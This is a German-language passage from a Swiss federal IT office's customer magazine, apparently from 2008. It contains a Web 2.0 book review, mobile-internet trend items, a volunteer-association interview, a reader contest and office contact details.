3.0. Das Besondere am Tom Albys Werk: Man hat es nicht bloss mit einer weiteren Übersetzung aus dem Englischen zu tun, sondern das Buch ist im Original deutsch und auch aus einer vertrauten (deutschen) Perspektive heraus geschrieben. Im letzten Kapitel des Buches widmet Alby 45 Seiten verschiedenen Interviews mit Persönlichkeiten der Web-2.0-Szene, schwergewichtig aus dem Weblog-Umfeld. Dem Thema Web 2.0 kann man sich natürlich von verschiedener Seite nähern. Alby tut’s wohl bewusst auf eine eher einfache Art. Für diejenigen, die von Blogs & Co. bereits eine sehr klare Vorstellung haben, ist das Buch zu wenig spezifisch. HL Tom Alby: «Web 2.0», 264 Seiten, Hanser Verlag, CHF 41.50 › Trendreport Was geht ab in der Welt des digitalen Lifestyles? Die «Eisbrecher»-Redaktion hält Ausschau und verrät aktuelle Trends. Googeln mit der Handykamera. Das Handy dürfte den PC als meistgenutzte Schnittstelle zum Internet bald ablösen. Das ETH-Start-up Kooaba (www.kooaba.com) hat dazu eine Technologie entwickelt, mit der man über die integrierte Kamera nach Infos aus dem Internet suchen kann. Hierzu fotografiert man das Objekt des Interesses mit der Handykamera. Erkennt Kooaba das Objekt auf dem Foto, liefert der Dienst umgehend die Suchresultate aufs Handy. Bis jetzt funktioniert Kooaba nur mit aktuellen Kinofilmplakaten. Grundsätzlich kann aber die gesamte gegenständliche Welt, von Kunstwerken über Weinetiketten bis hin zu Details einer Sehenswürdigkeit, ins System integriert werden. Reportage per Handy. Das Multimedia-Handy ist das zentrale Reporterwerkzeug der nächsten Journalistengeneration, ist sich die Axel Springer Akademie in Berlin sicher, denn das Mobiltelefon ermögliche «crossmediales Story-Telling schon an der Quelle». Darum hat die bekannte deutsche Journalistenschule neu das Fach «Handy-Reporting» in den Lehrplan aufgenommen. Die Medienleute von morgen sollen von unterwegs per Handy alle Medienkanäle mit Video, Audio, Foto und Text bedienen können. Dies spare wertvolle Zeit und bringe die Inhalte schneller zu den Nutzerinnen und Nutzern. Bürgerfunk 2.0. Während angehende Medienprofis lernen, das Handy für ihre Arbeit einzusetzen, gehen Hinz und Kunz künftig via Mobiltelefon gleich selbst auf Sendung: Dank Sites wie 1000mikes.com kann jetzt jede und jeder seinen eigenen Radiokanal aufmachen, live und von fast jedem denkbaren Ort aus. Einfach online registrieren und eine Zürcher Telefonnummer anrufen – das Handy wird jetzt zum Mikrofon – und schon ist man «on air»! Gehört werden die Sendungen per Livestream über die Website, verpasste Sendungen sind dort im Archiv gespeichert. HL Tech Quote «Der Computer ist eine subversive Maschine: Ein Freund des Volkes und ein Feind der Tyrannen.» Wau Holland (1951-2001), deutscher Journalist und Computer-Aktivist, Mitbegründer des Chaos Computer Clubs BITS & Bytes 22 SMSInterview Die ausgefallenen Hobbys der BIT-Mitarbeitenden. Jürg Porro (38), Bereichsleiter Competence Center GEVER, engagiert sich in der Jungen Wirtschaftskammer. Interview: Marc Bärtschi. Was ist die Junge Wirtschaftskammer? Wir sind ein Non-Profit-Verein, der weltweit Ableger und lokale Organisationen (LOMs) hat und zwei Ziele verfolgt: Zum einen die Förderung und Weiterbildung der eigenen Mitglieder und zum anderen setzen wir uns für die Allgemeinheit ein. Wir möchten so ein wenig zu einer besseren Welt beitragen. Das ist ein hochgestecktes Ziel … Wir versuchen einfach, mit unseren Möglichkeiten die Welt von morgen lebenswerter zu machen. So setzen wir uns besonders für Kinder ein. Unser LOM mit Namen «Pfannenstiel» hat z.B. 2006 den Benefizanlass «Prominente zeigen ihr Herz» durchgeführt, wo wir von Prominenten gestaltete Herzen zugunsten von herzkranken Kindern versteigerten (siehe Bild, Red.). Wie muss man sich das Vereinsleben vorstellen? Etwa einmal im Monat findet ein Anlass statt Übrigens: Das «Eisbrecher»-Abo ist gratis Den «Eisbrecher» können Sie kostenlos abonnieren. Senden Sie einfach eine E-Mail mit Angabe Ihrer Adresse an eisbrecher@bit. admin.ch oder eine SMS mit Ihrer Adresse an die Nummer 079 570 05 89. über ein bestimmtes Thema. Schwerpunkte sind Wirtschaftsthemen, aber auch das Allgemeinwissen kommt nicht zu kurz. Beispiele von Anlässen sind: Lach-Seminare, Firmenbesuche oder ein Referat eines Wirtschaftsführers. Andere Kammern versuchten sich auch schon als Weinbauern ... Wie viele Mitglieder hat die Vereinigung? Weltweit haben wir über 200 000 aktive Mitglieder. Die internationale Dachorganisation ist in nationale und regionale Unterorganisationen aufgeteilt. In der Schweiz haben wir gut 3000 Mitglieder in über 70 LOMs. Jedermann und jedefrau unter 40 Jahren, welche(r) aktiv soziale Verantwortung tragen will, kann Aktivmitglied werden. Vielen Dank für das Interview. Junge Wirtschaftskammer Schweiz www.jci.ch Ihre Meinung ist uns wichtig Sie lesen die Kundenzeitung des BIT. Der «Eisbrecher» macht neue Produkte des BIT bekannt, informiert über laufende Projekte, berichtet von BIT-Events und widmet sich in jeder Nummer einem spannenden IT-Thema. Die «Eisbrecher»Redaktion schreibt für Fachleute und User und wüsste gerne, ob Ihnen Themenmix und Gestaltung zusagen. Sagen Sie uns, was Ihnen am «Eisbrecher» gefällt und was nicht. Kritik, Anregungen, Lob und Fragen richten Sie bitte an [email protected]. Die «Eisbrecher»-Redaktion freut sich darüber. BITS & Bytes 23 Mixed Pixels Das «Eisbrecher»-Team hat wiederum eine Bildercollage für Sie zusammengestellt. Haben Sie den englischen Begriff aus der Welt der Informationstechnologie erraten? Machen Sie mit und gewinnen Sie eine 4,5 kg schwere Toblerone! Senden Sie Ihre Antwort per E-Mail an [email protected] oder per SMS an die Telefonnummer 079 570 05 89. Teilnahmeschluss ist der 15. August 2008. Bei mehreren richtigen Einsendungen entscheidet das Los. Viel Glück! Die Gewinnerin der letzten Ausgabe war Sabina Giannoussios von Präsenz Schweiz. Das gesuchte Lösungswort lautete: «Startknopf». Die BIT-Kontakt-Box BIT-Intranet http://intranet.bit.admin.ch Eisbrecher www.bit.admin.ch/eisbrecher [email protected] Eisbrecher-Redaktion, Kundenkommunikation Nora Kelemen, Bereichsleiterin Kunden kommunikation Tel.: +41 31 323 38 47 Account Management [email protected] Tel.: +41 31 325 20 40 Service Desk BIT [email protected] Tel.: +41 31 325 88 88 Supportline CC SAP [email protected] Tel.: +41 31 325 80 82 MAC-Aufträge http://intranet.bit.admin.ch/mac Tel.: +41 31 325 88 88 IT-Ausbildung des BIT www.bit.admin.ch/edu [email protected] Tel.: +41 31 325 97 52 Natur Natur Natur Kultur Kultur Kultur Kultur Kultur Industrie Industrie Web 2.0, das so genannte Mitmachweb, ist in aller Munde. Es hat aber nicht nur sehr konkrete Auswirkungen auf Märkte und Konsumenten, sondern auch eine Geschichte. Mehr darüber auf den Seiten 15 und 16 und eine Auswahl an Web-2.0-Links im BIT-Intranet.